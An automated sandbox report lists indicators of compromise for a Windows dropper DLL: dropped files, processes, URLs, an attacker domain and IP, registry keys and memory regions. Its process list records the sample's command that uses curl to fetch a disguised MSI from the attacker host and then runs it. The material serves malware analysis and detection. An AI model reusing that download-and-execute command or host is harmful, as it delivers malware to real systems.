IOC Report
SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

loading gif

Files

File Path
Type
Category
Malicious
SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe (copy)
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe (copy)
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe (copy)
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\MSIbbb33.LOG
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\MSIbc4f7.LOG
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files.cab
Microsoft Cabinet archive data, many, 2465794 bytes, 2 files, at 0x2c +A "UIServices.exe" +A "vcruntime140.dll", ID 29986, number 1, 175 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\29b46379382ed74d83879371e86987c8.tmp
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\3439ecd5563108439a8db68236176daf.tmp
PE32+ executable (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\vcruntime140.dll (copy)
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\msiwrapper.ini
data
dropped
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files.cab
Microsoft Cabinet archive data, many, 2465794 bytes, 2 files, at 0x2c +A "UIServices.exe" +A "vcruntime140.dll", ID 29986, number 1, 175 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\c52dbbfefebf4f3e88ce36e5881f78eb$dpx$.tmp\67fcf2e8352ef94eab64e4a4d4509680.tmp
PE32+ executable (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\c52dbbfefebf4f3e88ce36e5881f78eb$dpx$.tmp\fcfd202f570ae346b7d75b811246e386.tmp
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\vcruntime140.dll (copy)
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\msiwrapper.ini
data
dropped
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files.cab
Microsoft Cabinet archive data, many, 2465794 bytes, 2 files, at 0x2c +A "UIServices.exe" +A "vcruntime140.dll", ID 29986, number 1, 175 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\1305f6fe679b4fa294331bb6eb899bc4$dpx$.tmp\0eae52cd25d2e54183e98bebd14ba490.tmp
PE32+ executable (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\1305f6fe679b4fa294331bb6eb899bc4$dpx$.tmp\30833088ae6bfb4abc107567083083c9.tmp
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\vcruntime140.dll (copy)
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\msiwrapper.ini
data
dropped
C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
modified
C:\Windows\Installer\3bbba0.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
dropped
C:\Windows\Installer\3bbba1.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
dropped
C:\Windows\Installer\3bbba2.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
dropped
C:\Windows\Installer\MSI1F1E.tmp
data
dropped
C:\Windows\Installer\MSI1F4D.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Installer\MSI24FC.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Installer\MSI8C81.tmp
data
dropped
C:\Windows\Installer\MSI8CB0.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Installer\MSI931A.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Installer\MSIC14D.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Installer\MSIECC4.tmp
data
modified
C:\Windows\Installer\MSIECF4.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Installer\SourceHash{F73CE0E6-78CF-454D-9161-7ECE19A3E9D5}
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Installer\inprogressinstallinfo.ipi
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Logs\DPX\setupact.log
CSV text
dropped
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Windows\Temp\~DF08EC10C6FA1D2184.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF0E992ED88844D6C1.TMP
data
dropped
C:\Windows\Temp\~DF17A798673345C078.TMP
data
dropped
C:\Windows\Temp\~DF25B15AEE30697DAD.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF36464CBF16E54E06.TMP
data
dropped
C:\Windows\Temp\~DF49A8548405E9067B.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF4DE7771CC64A5A9A.TMP
data
dropped
C:\Windows\Temp\~DF4F91D2AF9D4E15DB.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF62C5956E9BC9E586.TMP
data
dropped
C:\Windows\Temp\~DF7B2A307C8AA17666.TMP
data
dropped
C:\Windows\Temp\~DF83A0503CF199010F.TMP
data
dropped
C:\Windows\Temp\~DF8F3DF616D8AE56F9.TMP
data
dropped
C:\Windows\Temp\~DFB2ED7D6DF90FC402.TMP
data
dropped
C:\Windows\Temp\~DFC0DF350B38604086.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFCBACE4E1BA405D3C.TMP
data
dropped
C:\Windows\Temp\~DFCCBD8EB92D670390.TMP
data
dropped
C:\Windows\Temp\~DFCE0B9ADDDB293763.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFF7B6CD3F78D0E5AF.TMP
data
dropped
\Device\ConDrv
ASCII text, with CRLF, CR, LF line terminators
dropped
There are 47 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe
"C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe"
malicious
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe
"C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe"
malicious
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe
"C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe"
malicious
C:\Windows\System32\loaddll64.exe
loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
C:\Windows\System32\rundll32.exe
rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen
C:\Windows\System32\rundll32.exe
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
C:\Windows\System32\cmd.exe
cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
C:\Windows\System32\cmd.exe
cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
C:\Windows\System32\curl.exe
curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
C:\Windows\System32\rundll32.exe
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen
C:\Windows\System32\cmd.exe
cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
C:\Windows\System32\cmd.exe
cmd /C %temp%\spclwow78x.msi
C:\Windows\System32\cmd.exe
cmd /C %temp%\spclwow78x.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
C:\Windows\System32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
C:\Windows\System32\cmd.exe
cmd /C %temp%\spclwow78x.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 8954BF1BAC6ED414A355FBE261097B79
C:\Windows\SysWOW64\icacls.exe
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\expand.exe
"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)LOW
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3860C12BB15873291EECD7576AA6B0CD
C:\Windows\SysWOW64\icacls.exe
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\expand.exe
"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 632F0AA6C1DCAE081535E1BA9D53BDC9
C:\Windows\SysWOW64\icacls.exe
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\expand.exe
"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)LOW
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 39 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://discord.com/api/v10/users/
unknown
https://api.telegram.org/bot
unknown
https://curl.se/docs/http-cookies.html
unknown
https://discord.com/api/v10/gatewayhttps://discord.com/api/v10/gateway/bot
unknown
https://discord.com/api/v10/guildshttps://discord.com/api/v10/invites/
unknown
https://github.com/serenity-rs/serenity
unknown
http://ipwhois.app/json/
unknown
http://anydesk10.hospedagemdesites.ws/UIServices.jpg-o%temp%
unknown
https://discord.com/api/v10/voice/regionshttps://discord.com/api/v10/webhooks/
unknown
https://discord.com/
unknown
https://curl.se/docs/alt-svc.html
unknown
https://discord.com/api/v10/guilds/iconbannerjoined_atstring
unknown
https://discord.com/api/v10/interactions//callback
unknown
https://ipapi.co//json/
unknown
http://anydesk10.hospedagemdesites.ws/UIServices.jpg
191.252.51.12
https://discord.com/DDiscordBot
unknown
https://status.discord.com/api/v2/incidents/unresolved.jsonhttps://status.discord.com/api/v2/schedul
unknown
https://curl.se/docs/hsts.html
unknown
https://discord.com/api/v10/oauth2/applications/
unknown
https://freegeoip.app/json/X
unknown
http://canonicalizer.ucsuri.tcs/680074007400700073003a002f002f00700069006e0067002e002e006e0061007600
unknown
https://discord.com/api/v10/channels/
unknown
https://discord.com/api/v10/sticker-packshttps://discord.com/api/v10/users/
unknown
http://ip-api.com/json/
unknown
https://freegeoip.app/json/
unknown
https://discord.com/api/v10/applications//commands/
unknown
http://canonicalizer.ucsuri.tcs/680074007400700073003a002f002f00700069006e0067002e002e00630068006500
unknown
http://anydesk10.hospedagemdesites.ws/UIServices.jpg-oC:
unknown
https://discord.com/api/v10/stage-instanceshttps://discord.com/api/v10/stage-instances/
unknown
https://docs.rs/getrandom#nodejs-es-module-supportCalling
unknown
http://anydesk10.hospedagemdesites.ws/UIServices.jpg8
unknown
http://anydesk10.hospedagemdesites.ws/UIServices.jpg4
unknown
There are 22 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
anydesk10.hospedagemdesites.ws
191.252.51.12

IPs

IP
Domain
Country
Malicious
191.252.51.12
anydesk10.hospedagemdesites.ws
Brazil
192.168.2.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\msiexec.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\msiexec.exe.ApplicationCompany
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
SessionHash

Memdumps

Base Address
Regiontype
Protect
Malicious
29C1E260000
heap
page read and write
1EEDC270000
heap
page read and write
1E122F60000
unkown
page readonly
27DB7518000
heap
page read and write
2719DC50000
heap
page read and write
7FF643397000
unkown
page readonly
2DB0000
heap
page read and write
221E5ACB000
heap
page read and write
2AC32EA0000
heap
page read and write
1EEDCB43000
heap
page read and write
27DB50A4000
heap
page read and write
1EEDC293000
heap
page read and write
18E5A77C000
heap
page read and write
7FF7974E4000
unkown
page write copy
1F505C13000
heap
page read and write
51A1000
trusted library allocation
page read and write
A5F000
heap
page read and write
EE6B2F8000
stack
page read and write
18E5ACFA000
heap
page read and write
29C1E39D000
heap
page read and write
27DB6F11000
heap
page read and write
221E5A30000
unkown
page read and write
29C1E742000
heap
page read and write
21271A30000
heap
page read and write
1F505C06000
heap
page read and write
18E5880D000
heap
page read and write
2852F85C000
heap
page read and write
18E5AA71000
heap
page read and write
237F57DE000
heap
page read and write
7FFC23C75000
unkown
page readonly
2852F900000
heap
page read and write
231CDFF9000
heap
page read and write
25708A50000
heap
page read and write
27DB50D6000
heap
page read and write
18E5ABDC000
heap
page read and write
1F505B60000
unkown
page readonly
59D3CFD000
stack
page read and write
29C1E3D9000
heap
page read and write
29C1E6F3000
heap
page read and write
29C1E464000
heap
page read and write
27DB702D000
heap
page read and write
3159000
heap
page read and write
F9A757B000
stack
page read and write
27DB6E2E000
heap
page read and write
27DB50DD000
heap
page read and write
221E5ACE000
heap
page read and write
27DB6FC0000
heap
page read and write
27DB7279000
heap
page read and write
5AAAE7E000
stack
page read and write
1840CA60000
heap
page read and write
29C1E817000
heap
page read and write
29C1E277000
heap
page read and write
18E5AA9B000
heap
page read and write
7FF6FC357000
unkown
page readonly
361F000
stack
page read and write
29C1E3DC000
heap
page read and write
29C1E35D000
heap
page read and write
27DB7014000
heap
page read and write
18E5A824000
heap
page read and write
18E587EC000
heap
page read and write
29C1C561000
heap
page read and write
18E5AB42000
heap
page read and write
27DB733D000
heap
page read and write
29C1E373000
heap
page read and write
34D9000
heap
page read and write
27DB6F93000
heap
page read and write
29C1E68F000
heap
page read and write
7FF6FC4A4000
unkown
page read and write
7FF6434E4000
unkown
page read and write
27DB6EED000
heap
page read and write
29C1E39D000
heap
page read and write
29C1E2D5000
heap
page read and write
27DB50C3000
heap
page read and write
231CEC30000
trusted library allocation
page read and write
27858413000
heap
page read and write
18E5880C000
heap
page read and write
29C1E276000
heap
page read and write
29C1E68B000
heap
page read and write
29C1E692000
heap
page read and write
27DB50DB000
heap
page read and write
29C1E692000
heap
page read and write
27DB7348000
heap
page read and write
F9A74FD000
stack
page read and write
550000
remote allocation
page read and write
3490000
trusted library allocation
page read and write
29C1E355000
heap
page read and write
29C1E816000
heap
page read and write
573E6FE000
stack
page read and write
18E5A6FC000
heap
page read and write
29C1E661000
heap
page read and write
27DB6FBB000
heap
page read and write
182AE397000
heap
page read and write
182AE3AB000
heap
page read and write
1F505C4C000
heap
page read and write
29C1C513000
heap
page read and write
29C1E354000
heap
page read and write
29C1E244000
heap
page read and write
18E5AA9B000
heap
page read and write
29C1EA67000
heap
page read and write
34C0000
heap
page read and write
56D25FF000
stack
page read and write
29C1E354000
heap
page read and write
29C1E3C6000
heap
page read and write
BF0000
remote allocation
page read and write
18E5A750000
heap
page read and write
EE69FFE000
stack
page read and write
3670000
heap
page read and write
29C1C563000
heap
page read and write
2AC3304E000
heap
page read and write
221E5C40000
heap
page read and write
329C000
stack
page read and write
F9A727F000
stack
page read and write
1AFAEC37000
heap
page read and write
27DB72A2000
heap
page read and write
27DB6F95000
heap
page read and write
56D23FF000
stack
page read and write
27DB7039000
heap
page read and write
1AFAEC41000
heap
page read and write
2785847F000
heap
page read and write
29C1E28D000
heap
page read and write
237F5827000
heap
page read and write
29C1E26F000
heap
page read and write
333E000
stack
page read and write
A91EFFE000
stack
page read and write
29C1E24F000
heap
page read and write
18E5A77C000
heap
page read and write
1C82B840000
heap
page read and write
18E5AB3D000
heap
page read and write
18E5A711000
heap
page read and write
182AE353000
heap
page read and write
18E5AB8C000
heap
page read and write
231CE001000
heap
page read and write
216AF835000
heap
page read and write
5B37DFF000
stack
page read and write
18E5A81C000
heap
page read and write
231CE011000
heap
page read and write
29C1E45C000
heap
page read and write
17782160000
heap
page read and write
18E5AA7F000
heap
page read and write
18E5AB50000
heap
page read and write
2AC33000000
heap
page read and write
1B09FC02000
trusted library allocation
page read and write
182AE170000
unkown
page readonly
27DB751E000
heap
page read and write
21271970000
unkown
page read and write
27858350000
heap
page read and write
29C1E251000
heap
page read and write
2AC33046000
heap
page read and write
18E5AB5C000
heap
page read and write
29C1E3C3000
heap
page read and write
27DB6FA3000
heap
page read and write
18E587F4000
heap
page read and write
29C1E2CB000
heap
page read and write
182AE38E000
heap
page read and write
1B09F43D000
heap
page read and write
27DB7271000
heap
page read and write
221E59D0000
heap
page read and write
2E0A000
heap
page read and write
29C1E2E0000
heap
page read and write
1E122F80000
unkown
page read and write
4D1FFFE000
stack
page read and write
C0F000
stack
page read and write
216AF6E0000
heap
page read and write
6FC000
stack
page read and write
18E58805000
heap
page read and write
2AC32F00000
heap
page read and write
7FF796FB1000
unkown
page execute read
182AE180000
unkown
page read and write
29C1E207000
heap
page read and write
18E5A826000
heap
page read and write
29C1E661000
heap
page read and write
21271980000
heap
page read and write
1F505B70000
unkown
page read and write
EBBE0FC000
stack
page read and write
237F57C0000
heap
page read and write
27DB5020000
heap
page read and write
18E5AA77000
heap
page read and write
278584CC000
heap
page read and write
27DB7024000
heap
page read and write
29C1E6AA000
heap
page read and write
18E587CC000
heap
page read and write
327E000
stack
page read and write
90E000
stack
page read and write
34E2000
heap
page read and write
27DB6E10000
heap
page read and write
29C1EA9D000
heap
page read and write
1E123060000
heap
page read and write
29C1E301000
heap
page read and write
29C1C470000
heap
page read and write
1EEDCB92000
heap
page read and write
573E2FF000
stack
page read and write
A91F6FF000
stack
page read and write
29C1E667000
heap
page read and write
18E5A626000
heap
page read and write
33D6000
heap
page read and write
237F5822000
heap
page read and write
27DB6EEF000
heap
page read and write
27DB6FAE000
heap
page read and write
18E5AC14000
heap
page read and write
17782170000
heap
page read and write
527E0FE000
stack
page read and write
18E5A64A000
heap
page read and write
27DB5028000
heap
page read and write
29C1E729000
heap
page read and write
27858C02000
heap
page read and write
2AC33063000
heap
page read and write
2DF0000
remote allocation
page read and write
27858513000
heap
page read and write
3151000
heap
page read and write
18E587E6000
heap
page read and write
A6979FE000
stack
page read and write
2AC3305A000
heap
page read and write
2852F84A000
heap
page read and write
18E5A826000
heap
page read and write
27DB6E54000
heap
page read and write
2852F813000
heap
page read and write
231CE370000
trusted library allocation
page read and write
7FF6FC357000
unkown
page readonly
221E5E19000
heap
page read and write
29C1E6AF000
heap
page read and write
1AFAEC29000
heap
page read and write
17782030000
heap
page read and write
27DB7036000
heap
page read and write
18E5ABC5000
heap
page read and write
18E5A6FA000
heap
page read and write
1840CB81000
heap
page read and write
1C82BB13000
heap
page read and write
29C1E68B000
heap
page read and write
29C1E732000
heap
page read and write
29C1E3D9000
heap
page read and write
29C1E3D1000
heap
page read and write
18E5AB50000
heap
page read and write
18E5AB31000
heap
page read and write
5B376BB000
stack
page read and write
29C1E221000
heap
page read and write
4EAC000
trusted library allocation
page read and write
29C1E45C000
heap
page read and write
27DB7400000
heap
page read and write
EBBDA7B000
stack
page read and write
18E5A66A000
heap
page read and write
1EEDC252000
heap
page read and write
1F505C4C000
heap
page read and write
7FF64349A000
unkown
page readonly
29C1E320000
heap
page read and write
18E5A743000
heap
page read and write
29C1E729000
heap
page read and write
3167000
heap
page read and write
18E5A911000
heap
page read and write
2785846E000
heap
page read and write
18E5A66A000
heap
page read and write
EE6B0F7000
stack
page read and write
221E5A93000
heap
page read and write
29C1E71E000
heap
page read and write
32BE000
heap
page read and write
29C1E6AE000
heap
page read and write
34D1000
heap
page read and write
29C1C548000
heap
page read and write
18E5A76E000
heap
page read and write
2C0000
heap
page read and write
7FFC23561000
unkown
page execute read
27DB72FA000
heap
page read and write
D0236FE000
stack
page read and write
B5D000
stack
page read and write
3167000
heap
page read and write
2852F83D000
heap
page read and write
1AFAEB90000
remote allocation
page read and write
182AE3A9000
heap
page read and write
3D0000
trusted library allocation
page read and write
1EEDC257000
heap
page read and write
18E5A64A000
heap
page read and write
29C1E4BD000
heap
page read and write
221E5A10000
unkown
page readonly
27DB6EBB000
heap
page read and write
18E5AB50000
heap
page read and write
18E5AC90000
heap
page read and write
7FF796FB0000
unkown
page readonly
18E5A66F000
heap
page read and write
18E5AAA2000
heap
page read and write
27DB7438000
heap
page read and write
18E5A6FA000
heap
page read and write
27DB6FBE000
heap
page read and write
29812613000
heap
page read and write
33DE000
heap
page read and write
18E5ABDC000
heap
page read and write
2AC3306B000
heap
page read and write
27DB6F95000
heap
page read and write
27DB733F000
heap
page read and write
1EEDC23C000
heap
page read and write
27DB6F9F000
heap
page read and write
18E5AB33000
heap
page read and write
18E5ABDC000
heap
page read and write
F6F36FC000
stack
page read and write
459237C000
stack
page read and write
18E5A626000
heap
page read and write
27DB7024000
heap
page read and write
29C1E3CC000
heap
page read and write
27DB6FAC000
heap
page read and write
2852F800000
heap
page read and write
18E5AAEB000
heap
page read and write
34E2000
heap
page read and write
29C1E484000
heap
page read and write
29C1E6DC000
heap
page read and write
7FF796FB0000
unkown
page readonly
27DB50A6000
heap
page read and write
18E5AB50000
heap
page read and write
32B7000
heap
page read and write
30A7000
heap
page read and write
7FF79749A000
unkown
page readonly
18E5AA97000
heap
page read and write
1840CB5F000
heap
page read and write
